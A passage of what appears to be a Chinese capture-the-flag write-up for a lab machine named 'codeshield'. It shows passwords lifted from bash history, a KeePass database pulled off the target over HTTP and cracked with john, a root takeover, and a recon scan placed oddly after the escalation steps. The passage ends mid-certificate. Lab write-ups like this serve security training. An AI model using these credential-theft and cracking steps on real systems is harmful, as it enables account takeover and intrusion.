\u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557 \n @@@@@@@@@@@@@ @@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@@@ @@@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@ @@ \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d \n @@@@@@@@@@ @@@ \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \n @@@@@@@ @@@ \n @@@@@@@ \n\n _______________________________________________________________________________________________________\n | _USER FLAG!________________________________________________________________________________________ |\n | | | |\n | | Your_password_is_the_key_to_your_digital_life | |\n | | | |\n | |___________________________________________________________________________________________________| |\n |_______________________________________________________________________________________________________| <\/code><\/pre>\nhistory\u627e\u5230\u660e\u6587\u5bc6\u7801<\/h3>\nmitchellt@codeshield:~$ cat .bash_history \necho 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r \/home\/earlyp\/Development\/mining ."\necho 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r \/home\/earlyp\/Development\/mining \/tmp"\ncp -r \/tmp\/mining .\nls\ncd mining\/\nls\nexit<\/code><\/pre>\n\u5f97\u5230\u65b0\u5bc6\u7801EARL!YP7DeVel@OP<\/code>\uff0c\u5207\u6362\u5c31\u884c\uff1a<\/p>\nmitchellt@codeshield:~$ su - earlyp\nPassword: \nearlyp@codeshield:~$ ls -la\ntotal 116\ndrwxr-x--- 19 earlyp earlyp 4096 Aug 29 2023 .\ndrwxr-xr-x 14 root root 4096 Aug 26 2023 ..\n-rw------- 1 earlyp earlyp 36 Aug 29 2023 .bash_history\n-rw-r--r-- 1 earlyp earlyp 220 Jan 6 2022 .bash_logout\n-rw-r--r-- 1 earlyp earlyp 3771 Jan 6 2022 .bashrc\ndrwx------ 12 earlyp earlyp 4096 Aug 23 2023 .cache\ndrwx------ 16 earlyp earlyp 4096 Aug 28 2023 .config\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 22 2023 Desktop\ndrwxrwxr-x 3 earlyp earlyp 4096 Aug 28 2023 Development\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 28 2023 Documents\ndrwxr-xr-x 5 earlyp earlyp 4096 Aug 23 2023 Downloads\ndrwx------ 2 earlyp earlyp 4096 Aug 28 2023 .gnupg\ndrwx------ 3 earlyp earlyp 4096 Aug 22 2023 .local\ndrwxrwxr-x 6 earlyp earlyp 4096 Aug 29 2023 mining\ndrwxrwxr-x 2 earlyp earlyp 4096 Aug 23 2023 .mono\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 22 2023 Music\ndrwxr-xr-x 3 earlyp earlyp 4096 Aug 23 2023 Pictures\n-rw-r--r-- 1 earlyp earlyp 807 Jan 6 2022 .profile\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 22 2023 Public\n-rw-rw-r-- 1 earlyp earlyp 233 Aug 23 2023 .recently-used\ndrwx------ 3 earlyp earlyp 4096 Aug 22 2023 snap\ndrwx------ 2 earlyp earlyp 4096 Aug 22 2023 .ssh\n-rw-r--r-- 1 earlyp earlyp 0 Aug 22 2023 .sudo_as_admin_successful\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 22 2023 Templates\n-rw-r----- 1 earlyp earlyp 6 Aug 28 2023 .vboxclient-clipboard-tty2-control.pid\n-rw-r----- 1 earlyp earlyp 6 Aug 28 2023 .vboxclient-draganddrop-tty2-control.pid\n-rw-r----- 1 earlyp earlyp 6 Aug 28 2023 .vboxclient-hostversion-tty2-control.pid\n-rw-r----- 1 earlyp earlyp 6 Aug 28 2023 .vboxclient-seamless-tty2-control.pid\n-rw-r----- 1 earlyp earlyp 6 Aug 28 2023 .vboxclient-vmsvga-session-tty2-control.pid\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 22 2023 Videos<\/code><\/pre>\n\u63d0\u6743root(\u65b9\u6cd5\u4e00:kdbx\u6587\u4ef6)<\/h3>\n
\u4fe1\u606f\u641c\u96c6\u53ef\u4ee5\u627e\u5230\u4e00\u4e2a.kdbx<\/code>\u6587\u4ef6\uff0c\u7834\u89e3\u4e00\u4e0b\u5373\u53ef\u5f97\u5230root\u5bc6\u7801\uff1a<\/p>\nearlyp@codeshield:~$ grep -Pnir password<\/code><\/pre>\n\u627e\u5230\u4e00\u4e2a\u5bc6\u7801\u6587\u4ef6\uff1a<\/p>\n
.cache\/keepassxc\/keepassxc.ini:2:LastActiveDatabase=\/home\/earlyp\/Documents\/Passwords.kdbx\n.cache\/keepassxc\/keepassxc.ini:4:LastDatabases=\/home\/earlyp\/Documents\/Passwords.kdbx\n.cache\/keepassxc\/keepassxc.ini:6:LastOpenedDatabases=\/home\/earlyp\/Documents\/Passwords.kdbx<\/code><\/pre>\n\u62f7\u8d1d\u5230\u672c\u5730\u8fdb\u884c\u7834\u89e3\uff1a<\/p>\n
earlyp@codeshield:~$ cd Documents\/\nearlyp@codeshield:~\/Documents$ ls -la\ntotal 12\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 28 2023 .\ndrwxr-x--- 19 earlyp earlyp 4096 Aug 29 2023 ..\n-rw------- 1 earlyp earlyp 1918 Aug 28 2023 Passwords.kdbx\nearlyp@codeshield:~\/Documents$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n10.0.2.4 - - [30\/May\/2025 07:05:05] "GET \/Passwords.kdbx HTTP\/1.1" 200 -\n^C\nKeyboard interrupt received, exiting.<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ wget http:\/\/$IP:8888\/Passwords.kdbx\n--2025-05-30 03:26:21-- http:\/\/10.0.2.22:8888\/Passwords.kdbx\nConnecting to 10.0.2.22:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1918 (1.9K) [application\/octet-stream]\nSaving to: \u2018Passwords.kdbx\u2019\n\nPasswords.kdbx 100%[====================================================================================================>] 1.87K --.-KB\/s in 0s \n\n2025-05-30 03:26:21 (198 MB\/s) - \u2018Passwords.kdbx\u2019 saved [1918\/1918]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ keepass2john Passwords.kdbx > hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ john hash --wordlist=pass \nUsing default input encoding: UTF-8\nLoaded 1 password hash (KeePass [SHA256 AES 32\/64])\nCost 1 (iteration count) is 3225806 for all loaded hashes\nCost 2 (version) is 2 for all loaded hashes\nCost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\n0g 0:00:00:04 DONE (2025-05-30 03:27) 0g\/s 2.309p\/s 2.309c\/s 2.309C\/s Xxxxxxxxx002..Xxxxxxxxxx01\nSession completed. <\/code><\/pre>\n\u90a3\u53ea\u80fdrockyou<\/code>\u4e86\uff0c\u8fd9\u91cc\u5feb\u901f\u527d\u7a83\u4e86\u4e00\u4e0b\u5bc6\u7801\uff1a<\/p>\nmandalorian<\/code><\/pre>\n\u53bb\u5728\u7ebf\u7684\u7ba1\u7406\u5668\u4e0a\u770b\u4e00\u4e0b\u5bc6\u7801\uff1a<\/p>\n
<\/div><\/p>\nroot:7%z5,c9=w6[x8=<\/code><\/pre>\n\u5207\u6362\u7528\u6237\u62ff\u5230rootshell\uff01<\/p>\n
earlyp@codeshield:~\/Documents$ su - root\nPassword: \nroot@codeshield:~# ls -la\ntotal 92\ndrwx------ 9 root root 4096 Aug 26 2023 .\ndrwxr-xr-x 19 root root 4096 Aug 22 2023 ..\n-rw------- 1 root root 0 Aug 30 2023 .bash_history\n-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc\ndrwx------ 2 root root 4096 Aug 28 2023 .cache\ndrwxr-xr-x 2 root root 4096 Aug 26 2023 cowrie\ndrwxr-xr-x 3 root root 4096 Aug 26 2023 .iredmail\ndrwx------ 3 root root 4096 Aug 23 2023 .launchpadlib\n-rw------- 1 root root 20 Aug 23 2023 .lesshst\ndrwxr-xr-x 3 root root 4096 Aug 22 2023 .local\n-r-------- 1 root root 45 Aug 26 2023 .my.cnf\n-rw-r--r-- 1 root root 91 Aug 26 2023 .my.cnf-amavisd\n-rw-r--r-- 1 root root 92 Aug 26 2023 .my.cnf-fail2ban\n-rw-r--r-- 1 root root 93 Aug 26 2023 .my.cnf-iredadmin\n-rw-r--r-- 1 root root 91 Aug 26 2023 .my.cnf-iredapd\n-rw-r--r-- 1 root root 93 Aug 26 2023 .my.cnf-roundcube\n-r-------- 1 root root 89 Aug 26 2023 .my.cnf-vmail\n-r-------- 1 root root 94 Aug 26 2023 .my.cnf-vmailadmin\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rw-r--r-- 1 root root 2528 Aug 26 2023 root.txt\n-rw-r--r-- 1 root root 66 Aug 26 2023 .selected_editor\ndrwx------ 4 root root 4096 Aug 22 2023 snap\ndrwx------ 2 root root 4096 Aug 22 2023 .ssh\n-rw-r--r-- 1 root root 0 Aug 22 2023 .sudo_as_admin_successful\n-rw-r--r-- 1 root root 290 Aug 26 2023 .wget-hsts\nroot@codeshield:~# cat root.txt \n\n @@@ \n @@@@@@@@@ @@@@@@ \n @@@@@@@@@@@@@@ (@@ \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557 \n @@@@@@@@@@@@@ @@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@@@ @@@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@ @@ \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d \n @@@@@@@@@@ @@@ \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \n @@@@@@@ @@@ \n @@@@@@@ \n\n _______________________________________________________________________________________________________\n | _ROOT FLAG!________________________________________________________________________________________ |\n | | | |\n | | Educate_your_employees_on_password_safety | |\n | | | |\n | |___________________________________________________________________________________________________| |\n |_______________________________________________________________________________________________________| <\/code><\/pre>\n\u63d0\u6743root(\u65b9\u6cd52:lxd)<\/h3>\n
\u4e5f\u662f\u770b\u522b\u7684\u5e08\u5085\u7684\u601d\u8def\u7684\uff0c\u771f\u6ca1\u6ce8\u610f\u5230\uff0c\u539f\u56e0\u662f\u4e00\u4e2a\u7279\u6b8a\u7684\u7ec4\u6743\u9650\uff1a<\/p>\n
earlyp@codeshield:~$ id\nuid=1000(earlyp) gid=1000(earlyp) groups=1000(earlyp),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd)<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ IP=10.0.2.22 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\n\nOpen 10.0.2.22:21\nOpen 10.0.2.22:22\nOpen 10.0.2.22:25\nOpen 10.0.2.22:110\nOpen 10.0.2.22:143\nOpen 10.0.2.22:443\nOpen 10.0.2.22:465\nOpen 10.0.2.22:80\nOpen 10.0.2.22:587\nOpen 10.0.2.22:993\nOpen 10.0.2.22:995\nOpen 10.0.2.22:2222\nOpen 10.0.2.22:3389\nOpen 10.0.2.22:22222\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.5\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-rw-r-- 1 1002 1002 2349914 Aug 30 2023 CodeShield_pitch_deck.pdf\n| -rw-rw-r-- 1 1003 1003 67520 Aug 28 2023 Information_Security_Policy.pdf\n|_-rw-rw-r-- 1 1004 1004 226435 Aug 28 2023 The_2023_weak_password_report.pdf\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to ::ffff:10.0.2.4\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 2\n| vsFTPd 3.0.5 - secure, fast, stable\n|_End of status\n22\/tcp open ssh syn-ack OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 32:14:67:32:02:7a:b6:e4:7f:a7:22:0b:02:fd:ee:07 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuHgUlIwWnDaiir2GGz0SZ364+nUeN06MhKR1Ahpj0qttOmTUXB45W9LOLALPxvRIWFsE7b04T5MK4kCvM4VwKai+n6ON4kEkAqImw8UDpviFSLn5+A19IkBkiDPUtm2G\/DD+NTXj2w1TD2Pr1Wi6zY6tN3klkf6bkcszQ863BrGe5WHQhnNotc8+O5U8Fl01Fu46Pd6arpCpvaXgBL7h9eOcIHaTqComgbeDcrqmSiGM1RRzhh\/er1WtfClT0bFjSCaDe5NpE0Oat92xzFuQ62c3Z5hqDfYLh6mkFGH062Lc4xkGS84q2GByWzvKgxXtAGDURdxGkpo0H9FAmuaKb\n| 256 34:e4:d0:5d:bd:bc:9e:3f:4c:f9:1e:7d:3c:60:ce:6e (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKw9aldAVwBR4fxzLD1Dqr4iBFV11fNBaZ+8pX4f1HDbPEscd2BkHMsYxR17e0zpSttM6DSfKT+YbLu2lDHWHmg=\n| 256 ef:3c:ff:f9:9a:a3:aa:7d:5a:82:73:b9:8c:b8:97:04 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPXrs+Ma5M6viFKpjdt5NluM7u7W2jtKcyf4oe2UtFM+\n25\/tcp open smtp syn-ack Postfix smtpd\n|_smtp-commands: SMTP: EHLO 521 5.5.1 Protocol error\\x0D\n80\/tcp open http syn-ack nginx\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to https:\/\/10.0.2.22\/\n110\/tcp open pop3 syn-ack Dovecot pop3d\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n|_pop3-capabilities: TOP UIDL SASL STLS RESP-CODES CAPA AUTH-RESP-CODE PIPELINING\n143\/tcp open imap syn-ack Dovecot imapd (Ubuntu)\n|_imap-capabilities: IDLE SASL-IR more have ID post-login listed Pre-login ENABLE LOGINDISABLEDA0001 IMAP4rev1 capabilities OK LOGIN-REFERRALS LITERAL+ STARTTLS\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| 